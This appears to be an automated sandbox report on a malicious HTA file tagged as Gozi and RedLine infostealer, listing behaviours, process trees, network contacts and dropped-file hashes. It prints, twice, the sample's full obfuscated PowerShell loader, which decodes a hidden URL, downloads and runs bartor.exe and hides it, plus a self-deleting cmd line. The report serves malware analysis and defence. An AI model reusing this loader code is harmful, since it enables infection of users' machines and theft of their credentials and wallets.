Malware Analysis Report

2024-10-19 01:08

Sample ID 220805-byny1seddm
Target 55.hta
SHA256 e49c5359656eedbca5bffe8ab5aada0e0b3301c47e426b028f27d6e89027adad
Tags
gozi_ifsb redline 11111 bart banker discovery infostealer spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e49c5359656eedbca5bffe8ab5aada0e0b3301c47e426b028f27d6e89027adad

Threat Level: Known bad

The file 55.hta was found to be: Known bad.

Malicious Activity Summary

gozi_ifsb redline 11111 bart banker discovery infostealer spyware stealer trojan

RedLine

Gozi, Gozi IFSB

RedLine payload

Executes dropped EXE

Downloads MZ/PE file

Blocklisted process makes network request

Checks computer location settings

Loads dropped DLL

Reads user/profile data of web browsers

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-08-05 01:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-08-05 01:33

Reported

2022-08-05 01:36

Platform

win7-20220715-en

Max time kernel

109s

Max time network

106s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\55.hta"

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\bartor.exe N/A
N/A N/A C:\Users\Admin\Downloads\WinZip.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\bartor.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1136 wrote to memory of 1876 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1136 wrote to memory of 1876 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1136 wrote to memory of 1876 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1136 wrote to memory of 1876 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1876 wrote to memory of 1916 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\bartor.exe
PID 1876 wrote to memory of 1916 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\bartor.exe
PID 1876 wrote to memory of 1916 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\bartor.exe
PID 1876 wrote to memory of 1916 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\bartor.exe
PID 1916 wrote to memory of 696 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 1916 wrote to memory of 696 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 1916 wrote to memory of 696 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 1916 wrote to memory of 696 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 696 wrote to memory of 1944 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\Downloads\WinZip.exe
PID 696 wrote to memory of 1944 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\Downloads\WinZip.exe
PID 696 wrote to memory of 1944 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\Downloads\WinZip.exe
PID 696 wrote to memory of 1944 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\Downloads\WinZip.exe
PID 1916 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 1916 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 1916 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 1916 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 1580 wrote to memory of 1444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 1580 wrote to memory of 1444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 1580 wrote to memory of 1444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 1580 wrote to memory of 1444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\55.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EnIuqI($tUJRTxlOGTzBBb, $sVHQTsPPna){[IO.File]::WriteAllBytes($tUJRTxlOGTzBBb, $sVHQTsPPna)};function wteXJMZiCxLIHWyVK($tUJRTxlOGTzBBb){if($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32676,32684,32684))) -eq $True){rundll32.exe $tUJRTxlOGTzBBb }elseif($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32688,32691,32625))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $tUJRTxlOGTzBBb}else{Start-Process $tUJRTxlOGTzBBb}};function jLwXZBeGxQAjckUU($EnIuqI){$OVWWVDSjZvvguN=(bDbIUiomifraxsd @(32648,32681,32676,32676,32677,32686));$XHGthyalbeewKOEQPWZ=(Get-ChildItem $EnIuqI -Force);$XHGthyalbeewKOEQPWZ.Attributes=$XHGthyalbeewKOEQPWZ.Attributes -bor ([IO.FileAttributes]$OVWWVDSjZvvguN).value__};function hjUZSOEutRzDQjOlSx($ioMMScKpkah){$iHEFhbXBYCwXIirUfY = New-Object (bDbIUiomifraxsd @(32654,32677,32692,32622,32663,32677,32674,32643,32684,32681,32677,32686,32692));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$sVHQTsPPna = $iHEFhbXBYCwXIirUfY.DownloadData($ioMMScKpkah);return $sVHQTsPPna};function bDbIUiomifraxsd($DUtYcPEQU){$RsPcedMKJvyiH=32576;$qkuvmRDebHfQ=$Null;foreach($hGnJeoBRHGIJa in $DUtYcPEQU){$qkuvmRDebHfQ+=[char]($hGnJeoBRHGIJa-$RsPcedMKJvyiH)};return $qkuvmRDebHfQ};function RtvXhZhq(){$veIehdmMqql = $env:AppData + '\';$qitNbz = $veIehdmMqql + 'bartor.exe'; if (Test-Path -Path $qitNbz){wteXJMZiCxLIHWyVK $qitNbz;}Else{ $iplTNEkBLCQEiP = hjUZSOEutRzDQjOlSx (bDbIUiomifraxsd @(32680,32692,32692,32688,32634,32623,32623,32625,32633,32627,32622,32629,32630,32622,32625,32628,32630,32622,32625,32627,32625,32623,32674,32673,32690,32692,32687,32690,32622,32677,32696,32677));EnIuqI $qitNbz $iplTNEkBLCQEiP;wteXJMZiCxLIHWyVK $qitNbz;};jLwXZBeGxQAjckUU $qitNbz;;;;;}RtvXhZhq;

C:\Users\Admin\AppData\Roaming\bartor.exe

"C:\Users\Admin\AppData\Roaming\bartor.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C start C:\Users\%UserName%\Downloads\WinZip.exe

C:\Users\Admin\Downloads\WinZip.exe

C:\Users\Admin\Downloads\WinZip.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 7 & Del "bartor.exe"

C:\Windows\SysWOW64\choice.exe

choice /C Y /N /D Y /T 7

Network

Country Destination Domain Proto
RU 193.56.146.131:80 193.56.146.131 tcp
RU 193.56.146.131:80 193.56.146.131 tcp
NL 80.66.87.52:2500 tcp

Files

\Users\Admin\AppData\Roaming\bartor.exe

MD5 0f2be4fe0362766dcf339d4c03326bc4
SHA1 69e26e9e75e8a8359d232d8e14318b9235e1a828
SHA256 2f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529
SHA512 8d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150

\Users\Admin\Downloads\WinZip.exe

MD5 468042278a3e4841d3e33ccca10d99ca
SHA1 22532f37096a200d448420359c01bbebaaf6b820
SHA256 b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86
SHA512 4c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf

Analysis: behavioral2

Detonation Overview

Submitted

2022-08-05 01:33

Reported

2022-08-05 01:36

Platform

win10v2004-20220721-en

Max time kernel

147s

Max time network

152s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\55.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\bartor.exe N/A
N/A N/A C:\Users\Admin\Downloads\WinZip.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\bartor.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\bartor.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4364 wrote to memory of 876 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4364 wrote to memory of 876 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4364 wrote to memory of 876 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 876 wrote to memory of 4600 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\bartor.exe
PID 876 wrote to memory of 4600 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\bartor.exe
PID 876 wrote to memory of 4600 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\bartor.exe
PID 4600 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 4600 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 4600 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 4200 wrote to memory of 2668 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\Downloads\WinZip.exe
PID 4200 wrote to memory of 2668 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\Downloads\WinZip.exe
PID 4200 wrote to memory of 2668 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\Downloads\WinZip.exe
PID 4600 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 4600 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 4600 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 3448 wrote to memory of 2200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 3448 wrote to memory of 2200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 3448 wrote to memory of 2200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\55.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EnIuqI($tUJRTxlOGTzBBb, $sVHQTsPPna){[IO.File]::WriteAllBytes($tUJRTxlOGTzBBb, $sVHQTsPPna)};function wteXJMZiCxLIHWyVK($tUJRTxlOGTzBBb){if($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32676,32684,32684))) -eq $True){rundll32.exe $tUJRTxlOGTzBBb }elseif($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32688,32691,32625))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $tUJRTxlOGTzBBb}else{Start-Process $tUJRTxlOGTzBBb}};function jLwXZBeGxQAjckUU($EnIuqI){$OVWWVDSjZvvguN=(bDbIUiomifraxsd @(32648,32681,32676,32676,32677,32686));$XHGthyalbeewKOEQPWZ=(Get-ChildItem $EnIuqI -Force);$XHGthyalbeewKOEQPWZ.Attributes=$XHGthyalbeewKOEQPWZ.Attributes -bor ([IO.FileAttributes]$OVWWVDSjZvvguN).value__};function hjUZSOEutRzDQjOlSx($ioMMScKpkah){$iHEFhbXBYCwXIirUfY = New-Object (bDbIUiomifraxsd @(32654,32677,32692,32622,32663,32677,32674,32643,32684,32681,32677,32686,32692));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$sVHQTsPPna = $iHEFhbXBYCwXIirUfY.DownloadData($ioMMScKpkah);return $sVHQTsPPna};function bDbIUiomifraxsd($DUtYcPEQU){$RsPcedMKJvyiH=32576;$qkuvmRDebHfQ=$Null;foreach($hGnJeoBRHGIJa in $DUtYcPEQU){$qkuvmRDebHfQ+=[char]($hGnJeoBRHGIJa-$RsPcedMKJvyiH)};return $qkuvmRDebHfQ};function RtvXhZhq(){$veIehdmMqql = $env:AppData + '\';$qitNbz = $veIehdmMqql + 'bartor.exe'; if (Test-Path -Path $qitNbz){wteXJMZiCxLIHWyVK $qitNbz;}Else{ $iplTNEkBLCQEiP = hjUZSOEutRzDQjOlSx (bDbIUiomifraxsd @(32680,32692,32692,32688,32634,32623,32623,32625,32633,32627,32622,32629,32630,32622,32625,32628,32630,32622,32625,32627,32625,32623,32674,32673,32690,32692,32687,32690,32622,32677,32696,32677));EnIuqI $qitNbz $iplTNEkBLCQEiP;wteXJMZiCxLIHWyVK $qitNbz;};jLwXZBeGxQAjckUU $qitNbz;;;;;}RtvXhZhq;

C:\Users\Admin\AppData\Roaming\bartor.exe

"C:\Users\Admin\AppData\Roaming\bartor.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C start C:\Users\%UserName%\Downloads\WinZip.exe

C:\Users\Admin\Downloads\WinZip.exe

C:\Users\Admin\Downloads\WinZip.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 7 & Del "bartor.exe"

C:\Windows\SysWOW64\choice.exe

choice /C Y /N /D Y /T 7

Network

Country Destination Domain Proto
RU 193.56.146.131:80 193.56.146.131 tcp
RU 193.56.146.131:80 193.56.146.131 tcp
IE 20.50.73.9:443 tcp
NL 67.26.105.254:80 tcp
US 8.8.8.8:53 trackingg-protectioon.cdn1.mozilla.net udp
NL 80.66.87.52:2500 tcp
NL 67.26.105.254:80 tcp
NL 194.76.225.168:80 tcp

Files

C:\Users\Admin\AppData\Roaming\bartor.exe

MD5 0f2be4fe0362766dcf339d4c03326bc4
SHA1 69e26e9e75e8a8359d232d8e14318b9235e1a828
SHA256 2f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529
SHA512 8d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150

C:\Users\Admin\Downloads\WinZip.exe

MD5 468042278a3e4841d3e33ccca10d99ca
SHA1 22532f37096a200d448420359c01bbebaaf6b820
SHA256 b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86
SHA512 4c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf
